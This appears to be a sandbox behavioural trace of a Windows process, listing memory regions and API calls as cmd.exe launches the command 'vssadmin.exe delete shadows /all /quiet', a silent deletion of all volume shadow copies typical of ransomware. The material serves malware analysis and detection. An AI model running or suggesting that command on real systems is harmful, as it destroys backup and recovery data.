os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "59" os_parent_pid = "0xe7c" cmd_line = "cmd.exe /C vssadmin.exe delete shadows /all /quiet " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 27853 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 27854 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 27855 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 27856 start_va = 0x170000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 27857 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 27858 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 27859 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 27860 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 
region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 27861 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 27862 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 27863 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 27864 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 27865 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 27866 start_va = 0x450000 end_va = 0x45ffff entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 27867 start_va = 0x460000 end_va = 0x55ffff entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 27868 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 27869 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 27870 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 27871 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = 
mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 27872 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 27873 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 27874 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 27875 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 27876 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 27877 start_va = 0x270000 end_va = 0x337fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 27878 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 27879 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 27880 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 27881 start_va = 0xd0000 end_va = 
0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 27882 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 27883 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 27884 start_va = 0x340000 end_va = 0x440fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 27885 start_va = 0x560000 end_va = 0x115ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 27886 start_va = 0x1160000 end_va = 0x12c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001160000" filename = "" Region: id = 27918 start_va = 0x12d0000 end_va = 0x159efff entry_point = 0x12d0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 599 os_tid = 0x85c [0190.788] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26fc34 | out: lpSystemTimeAsFileTime=0x26fc34*(dwLowDateTime=0xa69f5ea0, dwHighDateTime=0x1d440a9)) [0190.788] GetCurrentProcessId () returned 0x890 [0190.788] GetCurrentThreadId () returned 0x85c [0190.788] GetTickCount () returned 0x36537 [0190.788] QueryPerformanceCounter (in: lpPerformanceCount=0x26fc2c | out: lpPerformanceCount=0x26fc2c*=24757714142) returned 1 [0190.789] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0190.789] __set_app_type (_Type=0x1) [0190.789] __p__fmode () returned 0x76b331f4 [0190.789] __p__commode () returned 0x76b331fc [0190.789] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0190.789] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, 
_StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0190.789] GetCurrentThreadId () returned 0x85c [0190.789] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x85c) returned 0x38 [0190.789] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0190.789] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0190.789] SetThreadUILanguage (LangId=0x0) returned 0x409 [0190.789] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0190.789] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26fbc4 | out: phkResult=0x26fbc4*=0x0) returned 0x2 [0190.789] VirtualQuery (in: lpAddress=0x26fbfb, lpBuffer=0x26fb94, dwLength=0x1c | out: lpBuffer=0x26fb94*(BaseAddress=0x26f000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0190.789] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x26fb94, dwLength=0x1c | out: lpBuffer=0x26fb94*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0190.790] VirtualQuery (in: lpAddress=0x171000, lpBuffer=0x26fb94, dwLength=0x1c | out: lpBuffer=0x26fb94*(BaseAddress=0x171000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0190.790] VirtualQuery (in: lpAddress=0x173000, lpBuffer=0x26fb94, dwLength=0x1c | out: lpBuffer=0x26fb94*(BaseAddress=0x173000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0190.790] VirtualQuery (in: lpAddress=0x270000, lpBuffer=0x26fb94, dwLength=0x1c | out: lpBuffer=0x26fb94*(BaseAddress=0x270000, AllocationBase=0x270000, 
AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0190.790] GetConsoleOutputCP () returned 0x1b5 [0190.790] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0190.790] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0190.790] _get_osfhandle (_FileHandle=1) returned 0x7 [0190.790] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0190.790] _get_osfhandle (_FileHandle=1) returned 0x7 [0190.790] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0190.790] _get_osfhandle (_FileHandle=1) returned 0x7 [0190.790] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0190.790] _get_osfhandle (_FileHandle=0) returned 0x3 [0190.790] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0190.791] GetEnvironmentStringsW () returned 0x470128* [0190.791] FreeEnvironmentStringsW (penv=0x470128) returned 1 [0190.791] GetEnvironmentStringsW () returned 0x470128* [0190.791] FreeEnvironmentStringsW (penv=0x470128) returned 1 [0190.791] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26eb34 | out: phkResult=0x26eb34*=0x40) returned 0x0 [0190.791] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26eb3c, lpData=0x26eb40, lpcbData=0x26eb38*=0x1000 | out: lpType=0x26eb3c*=0x0, lpData=0x26eb40*=0xd8, lpcbData=0x26eb38*=0x1000) returned 0x2 [0190.791] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26eb3c, lpData=0x26eb40, lpcbData=0x26eb38*=0x1000 | out: lpType=0x26eb3c*=0x4, lpData=0x26eb40*=0x1, lpcbData=0x26eb38*=0x4) returned 0x0 [0190.791] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26eb3c, lpData=0x26eb40, lpcbData=0x26eb38*=0x1000 | out: lpType=0x26eb3c*=0x0, 
lpData=0x26eb40*=0x1, lpcbData=0x26eb38*=0x1000) returned 0x2 [0190.791] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26eb3c, lpData=0x26eb40, lpcbData=0x26eb38*=0x1000 | out: lpType=0x26eb3c*=0x4, lpData=0x26eb40*=0x0, lpcbData=0x26eb38*=0x4) returned 0x0 [0190.791] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26eb3c, lpData=0x26eb40, lpcbData=0x26eb38*=0x1000 | out: lpType=0x26eb3c*=0x4, lpData=0x26eb40*=0x40, lpcbData=0x26eb38*=0x4) returned 0x0 [0190.791] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26eb3c, lpData=0x26eb40, lpcbData=0x26eb38*=0x1000 | out: lpType=0x26eb3c*=0x4, lpData=0x26eb40*=0x40, lpcbData=0x26eb38*=0x4) returned 0x0 [0190.791] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26eb3c, lpData=0x26eb40, lpcbData=0x26eb38*=0x1000 | out: lpType=0x26eb3c*=0x0, lpData=0x26eb40*=0x40, lpcbData=0x26eb38*=0x1000) returned 0x2 [0190.791] RegCloseKey (hKey=0x40) returned 0x0 [0190.791] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26eb34 | out: phkResult=0x26eb34*=0x40) returned 0x0 [0190.792] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26eb3c, lpData=0x26eb40, lpcbData=0x26eb38*=0x1000 | out: lpType=0x26eb3c*=0x0, lpData=0x26eb40*=0x40, lpcbData=0x26eb38*=0x1000) returned 0x2 [0190.792] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26eb3c, lpData=0x26eb40, lpcbData=0x26eb38*=0x1000 | out: lpType=0x26eb3c*=0x4, lpData=0x26eb40*=0x1, lpcbData=0x26eb38*=0x4) returned 0x0 [0190.792] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26eb3c, lpData=0x26eb40, lpcbData=0x26eb38*=0x1000 | out: lpType=0x26eb3c*=0x0, lpData=0x26eb40*=0x1, lpcbData=0x26eb38*=0x1000) returned 0x2 [0190.792] 
RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26eb3c, lpData=0x26eb40, lpcbData=0x26eb38*=0x1000 | out: lpType=0x26eb3c*=0x4, lpData=0x26eb40*=0x0, lpcbData=0x26eb38*=0x4) returned 0x0 [0190.792] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26eb3c, lpData=0x26eb40, lpcbData=0x26eb38*=0x1000 | out: lpType=0x26eb3c*=0x4, lpData=0x26eb40*=0x9, lpcbData=0x26eb38*=0x4) returned 0x0 [0190.792] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26eb3c, lpData=0x26eb40, lpcbData=0x26eb38*=0x1000 | out: lpType=0x26eb3c*=0x4, lpData=0x26eb40*=0x9, lpcbData=0x26eb38*=0x4) returned 0x0 [0190.792] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26eb3c, lpData=0x26eb40, lpcbData=0x26eb38*=0x1000 | out: lpType=0x26eb3c*=0x0, lpData=0x26eb40*=0x9, lpcbData=0x26eb38*=0x1000) returned 0x2 [0190.792] RegCloseKey (hKey=0x40) returned 0x0 [0190.792] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886398 [0190.792] srand (_Seed=0x5b886398) [0190.792] GetCommandLineW () returned="cmd.exe /C vssadmin.exe delete shadows /all /quiet " [0190.792] GetCommandLineW () returned="cmd.exe /C vssadmin.exe delete shadows /all /quiet " [0190.792] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0190.793] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4719f0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0190.793] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0190.793] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: 
lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0190.793] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0190.793] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0190.793] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0190.793] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0190.793] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0190.793] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0190.793] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0190.793] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0190.793] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0190.793] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0190.793] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0190.793] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x26f900 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0190.793] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x26f900, lpFilePart=0x26f8fc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x26f8fc*="Desktop") returned 0x18 [0190.793] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0190.793] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x26f67c | out: lpFindFileData=0x26f67c) returned 0x46ffb8 [0190.794] FindClose (in: hFindFile=0x46ffb8 | out: hFindFile=0x46ffb8) returned 1 [0190.794] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x26f67c | out: lpFindFileData=0x26f67c) returned 0x46ffb8 [0190.794] FindClose (in: hFindFile=0x46ffb8 | out: hFindFile=0x46ffb8) returned 1 [0190.794] 
FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x26f67c | out: lpFindFileData=0x26f67c) returned 0x46ffb8 [0190.794] FindClose (in: hFindFile=0x46ffb8 | out: hFindFile=0x46ffb8) returned 1 [0190.794] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0190.794] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0190.794] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0190.794] GetEnvironmentStringsW () returned 0x470128* [0190.795] FreeEnvironmentStringsW (penv=0x470128) returned 1 [0190.795] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0190.795] GetConsoleOutputCP () returned 0x1b5 [0190.795] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0190.795] GetUserDefaultLCID () returned 0x409 [0190.796] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0190.796] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x26fa40, cchData=128 | out: lpLCData="0") returned 2 [0190.796] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x26fa40, cchData=128 | out: lpLCData="0") returned 2 [0190.796] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x26fa40, cchData=128 | out: lpLCData="1") returned 2 [0190.796] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0190.796] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0190.796] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0190.796] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") 
returned 4 [0190.796] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0190.796] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0190.796] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0190.796] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0190.796] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0190.796] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0190.796] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0190.797] GetConsoleTitleW (in: lpConsoleTitle=0x470190, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0190.901] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0190.901] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0190.901] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0190.901] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0190.902] _wcsicmp (_String1="vssadmin.exe", _String2=")") returned 77 [0190.902] _wcsicmp (_String1="FOR", _String2="vssadmin.exe") returned -16 [0190.903] _wcsicmp (_String1="FOR/?", _String2="vssadmin.exe") returned -16 [0190.903] _wcsicmp (_String1="IF", _String2="vssadmin.exe") returned -13 [0190.903] _wcsicmp (_String1="IF/?", _String2="vssadmin.exe") returned -13 [0190.903] _wcsicmp (_String1="REM", _String2="vssadmin.exe") returned -4 [0190.903] _wcsicmp (_String1="REM/?", _String2="vssadmin.exe") returned -4 [0190.904] GetConsoleTitleW (in: lpConsoleTitle=0x26f738, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") 
returned 0x1b [0190.904] GetFileAttributesW (lpFileName="vssadmin.exe" (normalized: "c:\\users\\eebsym5\\desktop\\vssadmin.exe")) returned 0xffffffff [0190.904] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18 [0190.904] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17 [0190.904] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18 [0190.904] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2 [0190.904] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19 [0190.904] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19 [0190.904] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19 [0190.904] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4 [0190.904] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4 [0190.904] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17 [0190.904] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3 [0190.904] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6 [0190.904] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18 [0190.904] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2 [0190.905] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6 [0190.905] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9 [0190.905] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9 [0190.905] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4 [0190.905] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4 [0190.905] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6 [0190.905] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15 [0190.905] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3 [0190.905] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19 [0190.905] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19 [0190.905] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14 [0190.905] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14 [0190.905] 
_wcsicmp (_String1="vssadmin", _String2="VOL") returned 4 [0190.905] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17 [0190.905] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3 [0190.905] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17 [0190.905] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2 [0190.905] _wcsicmp (_String1="vssadmin", _String2="START") returned 3 [0190.905] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18 [0190.905] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11 [0190.905] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9 [0190.905] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6 [0190.905] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6 [0190.905] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21 [0190.905] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16 [0190.905] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20 [0190.905] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19 [0190.905] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9 [0190.905] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18 [0190.905] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17 [0190.905] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18 [0190.905] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2 [0190.905] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19 [0190.905] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19 [0190.905] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19 [0190.905] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4 [0190.905] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4 [0190.905] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17 [0190.905] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3 [0190.905] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6 [0190.905] _wcsicmp 
(_String1="vssadmin", _String2="DATE") returned 18 [0190.905] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2 [0190.905] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6 [0190.905] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9 [0190.905] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9 [0190.905] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4 [0190.905] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4 [0190.905] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6 [0190.905] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15 [0190.906] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3 [0190.906] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19 [0190.906] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19 [0190.906] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14 [0190.906] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14 [0190.906] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4 